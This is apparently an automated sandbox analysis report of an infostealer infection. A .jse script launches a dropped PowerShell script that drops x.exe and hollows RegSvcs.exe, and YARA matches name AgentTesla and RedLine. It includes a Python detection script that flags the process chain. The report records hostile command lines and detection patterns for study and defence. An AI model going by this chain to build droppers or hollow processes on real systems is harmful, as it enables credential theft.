              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: AgenetTesla Type 2 Keylogger payload | Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1212, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, | 5_2_00431BE8
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 5_2_00446313
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, | 5_2_004333BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040E1D8 appears 44 times
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 004115D7 appears 36 times
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 00416C70 appears 39 times
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 00445AE0 appears 65 times
              Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 5.2.x.exe.2f40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
              Source: Process Memory Space: powershell.exe PID: 1212, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJSE@8/8@3/3
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0044AF6C GetLastError,FormatMessageW, | 5_2_0044AF6C
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, | 5_2_004333BE
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, | 5_2_00464EAE
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, | 5_2_0045D619
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, | 5_2_004755C4
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize, | 5_2_0047839D
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 5_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, | 5_2_0043305F
              Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\gj7umd[1].ps1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2564:120:WilError_03
              Source: C:\Windows\System32\wscript.exe | File created: C:\Temp\dddddd.ps1
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Command line argument: Wu | 5_2_0040D6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: doc00290320092.jse | ReversingLabs: Detection: 13%
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
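The process-creation lines above are the whole infection chain: wscript.exe runs the .jse, which writes dddddd.ps1 to C:\Temp and runs it with powershell.exe -File, PowerShell drops and starts x.exe from the user's Temp directory, and x.exe starts RegSvcs.exe whose recorded command line is x.exe's own path rather than a RegSvcs invocation (the image/command-line mismatch left behind when a legitimate .NET host is started suspended and its memory replaced). The following detection logic is an added example written for this page, not part of the Joe Sandbox report: it replays constructed Sysmon-style events modelled on the tree above (PIDs are made up; the user-writable directory list is an assumption to tune per environment) and flags the three links of the chain.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # path of the executable actually mapped into the process
    command_line: str   # command line recorded at process creation


# Constructed events modelled on the process tree in this report (Sysmon Event ID 1 style).
# PIDs are invented; images and command lines follow the report.
EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse"'),
    ProcEvent(2100, 2000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile '
              r'-ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"'),
    ProcEvent(2200, 2100, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(2300, 2100, r"C:\Users\user\AppData\Local\Temp\x.exe",
              r'"C:\Users\user\AppData\Local\Temp\x.exe"'),
    ProcEvent(2400, 2300, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Users\user\AppData\Local\Temp\x.exe" '),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Assumption: path fragments of directories any user can write to; adjust for the environment.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def first_token(cmdline: str) -> str:
    """Program named by a Windows command line: the quoted first token, or the bare one."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def script_argument(cmdline: str):
    """Path handed to powershell.exe -File, or None."""
    m = re.search(r'-file\s+(?:"([^"]+)"|(\S+))', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def ancestry(events, pid):
    """Image basenames from the outermost known ancestor down to pid."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(base(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def analyse(events):
    """Return (pid, rule, detail) findings for the three links of the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img, claimed = base(e.image), base(first_token(e.command_line))
        # Rule 1: the mapped image is not the program the command line names.
        # RegSvcs.exe running under x.exe's command line is the footprint of RunPE-style hollowing.
        if claimed and claimed != img:
            findings.append((e.pid, "image_cmdline_mismatch", f"{img} carries command line of {claimed}"))
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue
        pimg = base(parent.image)
        # Rule 2: a script host runs a .ps1 that lives in a user-writable directory.
        if pimg in SCRIPT_HOSTS and img == "powershell.exe":
            script = script_argument(e.command_line)
            if script and in_user_writable(script):
                findings.append((e.pid, "script_host_runs_dropped_ps1", script))
        # Rule 3: PowerShell starts an executable from a user-writable directory.
        if pimg == "powershell.exe" and in_user_writable(e.image):
            findings.append((e.pid, "powershell_runs_dropped_exe", e.image))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in analyse(EVENTS):
        print(f"{pid} {rule}: {detail}  chain={' > '.join(ancestry(EVENTS, pid))}")
```

Rule 1 is the one worth keeping even when the dropper changes: conhost.exe with its odd-looking `0xffffffff -ForceV1` arguments passes it, because its command line still names conhost.exe, while a hollowed RegSvcs.exe does not. Rule 2 and 3 are where the noise lives (admin scripts run from temp directories do exist), so they are better used to enrich the chain than to alert on their own.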
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
